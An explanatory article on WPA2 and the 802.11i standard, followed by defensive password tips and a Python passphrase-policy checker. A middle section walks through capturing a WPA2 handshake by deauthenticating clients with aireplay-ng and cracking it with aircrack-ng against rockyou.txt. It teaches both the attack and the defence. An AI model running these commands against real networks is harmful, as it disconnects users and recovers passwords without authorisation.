WPA2 is based on the 802.11i standard. WPA, its predecessor, can be considered a "migration" version and does not include all the features of IEEE 802.11i; WPA2 is the certified version of the full 802.11i standard. The 802.11i standard was ratified in June 2004. The Wi-Fi Alliance calls the pre-shared key versions WPA-Personal and WPA2-Personal, and the versions with 802.1X/EAP authentication WPA-Enterprise and WPA2-Enterprise.
Manufacturers are starting to produce a new generation of access points that support the WPA2 protocol, which uses the AES (Advanced Encryption Standard) encryption algorithm. With this algorithm the US government security requirement FIPS 140-2 is satisfied. "WPA2 is ideally designed for both the private and public sector enterprises. Products that are certified for WPA2 give IT managers the security that the technology meets interoperability standards," said Frank Hanzlik, Managing Director of the Wi-Fi Alliance. While some organizations are waiting for this new generation of AES-based products, it is important to point out that WPA-certified products remain secure according to the 802.11i standard.
Nowadays it is the most widely used protocol in homes; its only "weakness" is that the handshake can be captured and the password recovered offline by trial and error against dictionaries.
The goal when going after a WPA or WPA2 password is to capture the handshake that results when a client connects to the Wi-Fi network.
1.) We identify the interface name of our wireless card so we can put it in monitor mode.
2.) We put the card in monitor mode so it can capture all the Wi-Fi packets circulating through the air:
- airmon-ng start wlan0
3.) We select the Wi-Fi network we want to audit and capture only the packets directed to that network:
- airodump-ng -c <AP_CHANNEL> --bssid <BSSID> -w package_capture wlan0mon
4.) We need clients connected to that network in order to capture the handshake. Once there are, we send deauthentication packets to knock them off the network so we can capture the handshake at the moment they reconnect:
- aireplay-ng -0 15 -a <BSSID> wlan0mon
5.) Once the handshake is captured we crack it by brute force with a fairly common dictionary, 'rockyou.txt':
- aircrack-ng package_capture-01.cap -w /usr/share/wordlists/rockyou.txt
How to stay safe against these attacks
The main security weakness of this encryption is people themselves; here are some tips to follow when choosing a password:
- Never keep the default password.
- Use uppercase and lowercase letters, numbers and special characters.
- Do not use words or phrases that are well known or personally connected to you as the password.
- Do not write the password on a post-it and stick it on the router.
- Do not leave the network name of the router at its default, or attackers will easily know the type of router.
If you use phrases or familiar words, your password will be recovered easily with dictionaries like rockyou.
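As an added example (not part of the original article), the following Python shows why these tips matter: WPA2-Personal derives its PMK from the passphrase with PBKDF2-HMAC-SHA1, using the SSID as the salt and 4096 iterations, and that is exactly what a captured handshake is checked against offline, so passphrase strength and a non-default SSID are the only real protection. The check_passphrase policy, the 16-character minimum, and the short word and SSID-prefix lists are my own assumptions for illustration, not part of any standard.

```python
import hashlib

# Constructed samples for illustration; a real policy check would load a large
# wordlist and a fuller list of factory SSID patterns (both are assumptions here).
COMMON_WORDS = {"password", "admin", "12345678", "qwerty", "letmein"}
DEFAULT_SSID_PREFIXES = ("TP-LINK_", "NETGEAR", "Linksys", "dlink", "MOVISTAR_")
MIN_LENGTH = 16  # assumed policy threshold; the standard itself only requires 8


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit PMK the way WPA/WPA2-Personal does (IEEE 802.11i):
    PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 32-byte output.
    A captured four-way handshake lets this be recomputed offline for every
    candidate passphrase, so the passphrase (and a unique SSID acting as salt)
    is the only thing protecting the network."""
    if not 8 <= len(passphrase) <= 63 or not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA2-Personal passphrases are 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def check_passphrase(passphrase: str, ssid: str) -> list:
    """Apply the tips above as a policy; returns the list of problems found
    (an empty list means the passphrase and SSID pass)."""
    problems = []
    if not 8 <= len(passphrase) <= 63:
        problems.append("length must be between 8 and 63 characters")
    elif len(passphrase) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters: cheap to brute-force offline")
    classes = {"lowercase": str.islower, "uppercase": str.isupper,
               "digits": str.isdigit, "symbols": lambda c: not c.isalnum()}
    missing = [name for name, test in classes.items() if not any(test(c) for c in passphrase)]
    if missing:
        problems.append("missing character classes: " + ", ".join(missing))
    lowered = passphrase.lower()
    if any(word in lowered for word in COMMON_WORDS):
        problems.append("contains a common default or dictionary word")
    if ssid.lower() in lowered:
        problems.append("contains the network name")
    if ssid.startswith(DEFAULT_SSID_PREFIXES):
        problems.append("SSID looks like a factory default: rename it so precomputed "
                        "PMK tables for that SSID do not apply")
    return problems
```

The wpa2_pmk result for passphrase "password" and SSID "IEEE" matches the published IEEE 802.11i test vector, which is a quick way to confirm the derivation is the standard one.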